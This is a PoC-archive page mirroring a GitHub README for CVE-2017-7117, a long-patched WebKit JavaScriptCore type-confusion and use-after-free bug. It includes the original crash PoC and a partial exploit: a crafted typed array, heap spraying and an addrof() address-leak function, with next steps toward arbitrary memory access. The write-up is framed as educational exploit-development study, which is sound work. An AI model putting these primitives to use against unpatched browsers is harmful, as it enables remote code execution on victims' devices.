Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-7117 PoC — 多款Apple产品WebKit 安全漏洞

Source
https://github.com/rebelle3/cve-2017-7117
Associated Vulnerability
Title:多款Apple产品WebKit 安全漏洞 (CVE-2017-7117)
Description:An issue was discovered in certain Apple products. iOS before 11 is affected. Safari before 11 is affected. iCloud before 7.0 on Windows is affected. iTunes before 12.7 on Windows is affected. tvOS before 11 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Readme
# cve-2017-7117

## About the Bug

A type-confusion and UAF found in iOS 10.3.4 and earlier, Safari before 11.0.

CVE-2017-7117: [mitre.org](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7117)

## Original Proof of Concept

Discovered by @lokihardt, source: [Google Project Zero](https://project-zero.issues.chromium.org/issues/42450350)

```js
function f() {
  let o = {};
  for (let i in {xx: 0}) { // i is a String
    for (i of [0]) { // i is now a number, but JIT treats as String
    }
    print(o[i]); // whoops
  }  
}

f();
```

Running the code above will cause JSC to crash.

## The Exploit

We craft a large array `arr`, that the JIT compiler will become confused into beleiving is a string. 

```js
var arr = new Uint32Array(1 * 1024 * 1024 / 4); // 1mb | 1 item == 4 bytes
arr[4] = 0xb0; // to pass checks for the member m_hashAndFlags 
```

When the reference to `i` is lost, we maintain access to the original array `arr` and can read the underlying memory.

By spraying a known value we can find this and traveerse up to locate the pointer to any object.

```js
function addrof(obj) {

    // search the freed array for this number
    var locator = 0x1337;

    // spray the freed memory with the locator
    var sprays = [];
    for (var i = 0; i < 0x1000; ++i) {
        sprays.push(i % 2 == 0 ? locator : obj);
    }

    // find the first instance of the locator
    var found = null;
    for(var i = 0; i < arr.length; i++) {
        if(arr[i] == locator) {
            found = i
            break
        }
    }

    // the pointer for the object is 3 and 2 indicies after the locator
    return found && [arr[found + 3], arr[found + 2]]

}
```

Values are accessed in memory via a `Uint32Array`, lower bits first, upper bits second.

```js
let target = {
    foo: "bar"
}

let address = addrof(target)
// address: 0x0000ffff8d178e60
```

You can verify the address is valid using `describe()`

```js
print(describe(target))
// Object: 0xffff8d178e60 with butterfly (nil) (0xffff9099bba0:[Object, {foo:0}, NonArray, Proto:0xffff909b00a0, Leaf]), ID: 244
```

## Replicate the Setup

Currently tested on:
- Ubuntu 20.04.5 LTS ARM64
- Vulnerable JavaScriptCore (JSC) from libwebkitgtk version 2.16.0
  - Build archive: [launchpad.net](https://launchpad.net/ubuntu/+source/webkit2gtk/2.16.0-1)
- LLDB for memory inspection (optional)

Does not work (yet) on iPhone 5, iOS 10.3.4. Let's find out why ...

## Next Steps?

- Craft a fake object
- Read / write arbitrary memory
- Jailbreak iOS 10?

## Important

This repository is provided as an educational resource to track my learning in exploit development. This CVE has been patched for more than 7 years. Do NOT use this for nefarious purposes, obviously.
File Snapshot

 [4.0K]  /data/pocs/2d5cfb8e1e7420af40fa989b6618d4f0663645d2
├── [1.0K]  LICENSE
├── [1.4K]  poc.js
└── [2.7K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →